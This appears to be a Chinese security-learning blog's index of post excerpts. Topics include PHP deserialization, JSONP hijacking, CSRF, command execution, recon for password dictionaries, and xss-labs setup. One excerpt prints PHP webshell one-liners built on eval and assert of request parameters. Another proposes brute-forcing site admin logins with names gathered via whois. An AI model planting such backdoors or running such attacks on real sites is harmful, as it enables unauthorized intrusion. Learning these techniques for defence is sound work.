注意事项：阅读之前先要学会 php 的基础语法，面向对象的一些基础知识 什么是序列化和反序列化 序列化是将对象转换成可存储的字节序列的过程 反序列化是将字节序列恢复为对象 一个简单的实例 序列化 serialize 函数 123456789101112<?php class a{ var $name = "Lixiney"; //

Jsonp 原理 jsonp 可以让网页从别的域获取内容，即跨域读取数据 攻击者模拟用户向有漏洞的服务器发送 jsonp 请求，然后获取到了用户的某些信息，再将这些信息发送到攻击者可控的服务。 jsonp 最基本的原理就是，动态添加一个 <script> 标签，而script标签的 src属性是没有跨域限制的 由于同源策略的限制，xmlHttpRequest 只允许请求当前 相同协议

欠了好久的文章（之前一直想着要好好学安全的，但是玩起来就忘我了=_=），今天终于有时间能写写了。 什么是同源策略之前刚刚学习的时候，那是做一个前后端分离的项目，有一串json数据要从后端提取，前端用的语言是 vue，使用了8080端口，后端为php语言，80端口。后来发现这个数据愣是找不到，一番检查之下，发现是同源策略的问题。 那么问题来了，为什么会有同源策略呢？其实简单的

本篇文章留待有缘人看到。。。 今天不记录有关技术问题的文章，简单的写一些本人对于生活对于现实，以及一些对于修行上的感悟。 其实我个人不喜欢自己写东西，因为我明白，只要你写出来，就会有人看，就会有人信，又不可能人人都是圣人，难免会有些错误的观念，让他人学去岂不是误人子弟？当然现在有很大一部分人很“蒙”，认为记在脑子里就是会了，但是懂不懂呢？不知道，他们不去求证，知行不合一，当然这也是现在教育行业

攻击者通过某些技术手段欺骗用户的浏览器访问曾经认证过的网站并执行一些操作，挟持用户在当前已经登录的web应用程序上执行非本意的操作 攻击流程 用户登录站点a，并通过站点a的身份验证 用户未退出站点a，在同一个浏览器中访问危险站点b 站点b收到用户请求后，返回恶意代码并且发出访问站点a的请求 浏览器收到这些恶意代码后，在用户不知情的情况下，利用cookie的信息，向网站a发出恶意请求（修改密码，

eval函数123<?php@eval($_REQUEST['test']);?> assert 函数1<?php assert(@$_POST['test']); ?> function123456<?phpfunction test1($code){ $code($_REQUEST['test

命令执行漏洞是指服务器没有对执行的命令进行过滤，用户可以随意执行系统命令 漏洞原理 应用程序有的时候需要调用一些系统命令，在php中，可以执行命令的函数有 system() exec() shell_exec() passthru() popen() proc_open() pcntl_execl() 等，当黑客能够控制这些函数中的参数时，就可以将恶意的系统命令拼接到正常的命令中，从而造成RC

知己知彼，百战不殆 whois信息 得到注册人的信息 ​ 邮箱 ​ 电话号码 ​ 姓名 有的站长喜欢拿自己的姓名的拼音设置为密码，这样我们收集到信息之后可以生成一本字典，对网站的后台进行爆破 whois网站 whois.com 站长之家 http://whois.chinaz.com/ 子域名 谷歌语法 site: 指定域名 在线平台 ip反查域名 htt

本文档仅用于信息防御技术研究探讨，请勿用于其他用如图，渗透测试务必在已授权的情况下进行 安装 使用docker安装 拉取镜像1sudo docker pull vulfocus/xss-labs 启动1sudo docker run -dt --name xss -p 7777:80 vulfocus/xss-labs 题解level-1 get方式提交数据，在url栏 pay

Ajax 并不是一门编程语言，而是一种前后端交互的技术 什么是 Ajax通过在后台与服务器进行少量数据交换，Ajax 可以使用网页实现异步更新。这意味着可以在不重新加载整个网页的情况下，对网页的某部分进行更新。 Ajax 实例123456<script> function loadXMlDoc(){ // Ajax 脚本执行 }</script>